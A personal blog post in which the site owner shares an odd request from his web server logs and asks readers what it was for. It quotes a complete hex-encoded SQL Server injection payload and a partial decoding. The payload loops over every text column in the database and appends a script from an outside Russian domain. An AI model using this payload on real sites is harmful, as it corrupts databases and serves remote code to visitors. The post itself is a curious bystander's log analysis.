Dave on Facebook

Dave's profile on LinkedIn
DavesWeb visitors really liked:
Country Place Cookbook
Tomato Sauce Recipe
Bloody AwfulBelow AverageNothing SpecialGoodPretty Damn Good
My Status
Fabulous Snow!
Bloody AwfulBelow AverageNothing SpecialGoodPretty Damn Good
My Status
Thankful for Signs of Spring!
Bloody AwfulBelow AverageNothing SpecialGoodPretty Damn Good
Country Place Cookbook
Grandmother Snare's Iced Tea
Bloody AwfulBelow AverageNothing SpecialGoodPretty Damn Good
Gallery
Can Am Eyes
Bloody AwfulBelow AverageNothing SpecialGoodPretty Damn Good
Top Viewed items on DavesWeb:
My Status
Balsamic Vinaigarette Watermelon - 38,091 views
My Status
Cool car - 26,530 views
Gallery
Can Am Eyes - 25,967 views

No Live Blogging, Sorry - 16,716 views
My Status
Ads Sneaked Onto DavesWeb Part 2 of 2 - 16,252 views
Recently Viewed Items on DavesWeb:
Main
Another Bad Person Looking for Trouble?
Main
WFH
Main
Best of Critter Cam!
My Status
Ads Sneaked Onto DavesWeb Part 2 of 2
My Status
Bloomin Blueberries
Main: Welcome to Main
Another Bad Person Looking for Trouble?

I found an odd looking request in my log files:

  "/default.asp?guid=road_to_the_derby200303110002;
  declare%20@s%20varchar(4000);set%20@s=cast(0x4465434c 
  417265204054207641726368415228323535292c4063205641 
  52436861522832353529204445634c415245207461426c655f 
  637552736f7220635552734f5220466f722073654c65637420 
  412e4e414d652c622e4e614d452066724f6d207379736f624a 
  4543747320612c735973634f6c756d4e732062207768455265 
  20412e69643d422e496420616e4420412e58747950653d2755 
  2720616e642028622e78745970453d3939206f5220622e7854 
  5970653d3335204f7220622e78745970653d323331204f5220 
  422e78547950653d31363729204f70654e205441424c455f43 
  7572736f52204665546368204e4578542046524f6d20744162 
  6c655f435572736f7220494e546f2040542c4063207748496c 
  6528404046457443485f7354615455733d302920624567696e 
  20657845632827557064617445205b272b40742b275d205365 
  54205b272b40432b275d3d727472494d28436f4e7645725428 
  766152436841522834303030292c5b272b40432b275d29292b 
  63617354283078334337333633373236393730373432303733 
  37323633334436383734373437303341324632463737373737 
  37324536393645363436353738364137333245373237353246 
  37303631363736353245364137333345334332463733363337 
  32363937303734334520415320764152436861722835322929 
  2729206645746368204e4578742066726f4d205441626c655f 
  635552736f7220696e744f2040742c404320654e6420434c6f 
  5345205461624c655f437552734f72204445614c6c6f436174 
  65207441626c655f435572736f7220%20as%20varchar(4000 ));exec(@s);--
  

The seemingly meaningless numbers are Hexidecimal code. Using http://www.string-functions.com/hex-string.aspx, I converted the Hex code into this string:

  /default.asp?guid=road_to_the_derby200303110002;dec lare%20@s%20varchar(4000);set%20@s=
DeCLAre @T vArchAR(255),@c VARChaR(255) 
DEcLARE taBle_cuRsor cURsOR For seLect A.NAMe,b.NaME frOm sysobJECts a,sYscOlumNs b 
whERe A.id=B.Id anD A.XtyPe='U' and (b.xtYpE=99 oR b.xTYpe=35 Or b.xtYpe=231 OR B.xTyPe=167) 
OpeN TABLE_CursoR FeTch NExT FROm tAble_CUrsor INTo @T,@c wHIle(@@FEtCH_sTaTUs=0) 
bEgin exEc('UpdatE ['+@t+'] SeT ['+@C+']=rtrIM(CoNvErT(vaRChAR(4000),['+@C+']))+
‘’
') fEtch NExt froM TAble_cURsor intO @t,@C eNd CLoSE TabLe_CuRsOr DEaLloCate tAble_CUrsor
%20as%20varchar(4000));exec(@s);--

It looks like they were poking around for a SQLServer instance on the box and trying to make it run a .js page (currently removed from www.indexjs.ru). What do you think they were up to? Wonder what would have happened if my web server did have a SQLServer instance running on the same machine (which I don't think it does) and if that .js page had run?

3,605 views.
No users have rated this item yet.